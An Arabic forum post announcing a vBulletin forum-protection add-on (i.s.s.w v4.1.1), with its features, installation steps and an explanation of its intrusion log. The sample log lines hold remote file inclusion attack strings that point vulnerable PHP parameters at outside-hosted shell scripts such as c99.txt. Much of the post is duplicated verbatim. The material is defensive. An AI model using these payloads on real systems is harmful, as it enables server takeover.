من طرف doodoo الأربعاء 12 نوفمبر 2008 - 2:50اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحة التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحة التحكم كأختصار
5 : تنبية لكل تحديث للبرنامج
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
عمل الهاك : حماية المنتدى بشكل كامل بعون الله
الخيار الاول :
لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولة استغلالها للدخول على موقعك
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عناوين الموضوع
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.l chost.co.uk/site/administrator/components/com_jrea ctions/safe.txt?, libwww-perl/5.808
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحة التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحة التحكم كأختصار
5 : تنبية لكل تحديث للبرنامج
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
عمل الهاك : حماية المنتدى بشكل كامل بعون الله
الخيار الاول :
لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولة استغلالها للدخول على موقعك
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عناوين الموضوع
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.l chost.co.uk/site/administrator/components/com_jrea ctions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia .org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www. mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www. mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
دلوقتي دول ثلاث شيلات سنشرح بالتفصيل احد الاسطر
طبعا الفاصلة تفصل بين كل معلومه ومعلومة
,
التاريخ والوقت
2007-12-11, 05:50:44,
عدد المحاولات
1197370244
IP الموقع المصاب
209.67.223.188
الاصابة طبعا اتشفرت لاغراض امنيه
p=11575//codebb/lang_select
الاستغلال
?phpbb_root_path=http://5thw.lchost.co.uk/site/adm inistrator/components/com_jreactions/safe.txt?
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج يجيب اسمه يعني منين صدر الامر اذا كان من متصفح يطلعلك اسمه
libwww-perl/5.808
الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v4.0 issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث
شرح حذف الهاك
من لوحة تحكم المنتدي = التحكم بالمنتجات product = من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
-----------------------
التركيب
المهم نأتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 الى
counter.txt logfile_hacker.txt
cpnav_issw
وارفعهم داخل
vb\includes\xml
قم باستدعاء البرودكت من لوحة تحكم المنتدي
واتمنى لكم النجاح في التسطيب
ملاحظة مهمة : الهاك يتعارض مع اي هاك حمايه
الان من لوحة تحكم المنتدي قم برفع البرودكت
تم تجربة المنتج على الاصدار ات الأتية
3.6 + 3.7
صـور الهاك من داخل لوحة التحكم
طبعا الفاصلة تفصل بين كل معلومه ومعلومة
,
التاريخ والوقت
2007-12-11, 05:50:44,
عدد المحاولات
1197370244
IP الموقع المصاب
209.67.223.188
الاصابة طبعا اتشفرت لاغراض امنيه
p=11575//codebb/lang_select
الاستغلال
?phpbb_root_path=http://5thw.lchost.co.uk/site/adm inistrator/components/com_jreactions/safe.txt?
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج يجيب اسمه يعني منين صدر الامر اذا كان من متصفح يطلعلك اسمه
libwww-perl/5.808
الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v4.0 issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث
شرح حذف الهاك
من لوحة تحكم المنتدي = التحكم بالمنتجات product = من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
-----------------------
التركيب
المهم نأتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 الى
counter.txt logfile_hacker.txt
cpnav_issw
وارفعهم داخل
vb\includes\xml
قم باستدعاء البرودكت من لوحة تحكم المنتدي
واتمنى لكم النجاح في التسطيب
ملاحظة مهمة : الهاك يتعارض مع اي هاك حمايه
الان من لوحة تحكم المنتدي قم برفع البرودكت
تم تجربة المنتج على الاصدار ات الأتية
3.6 + 3.7
صـور الهاك من داخل لوحة التحكم
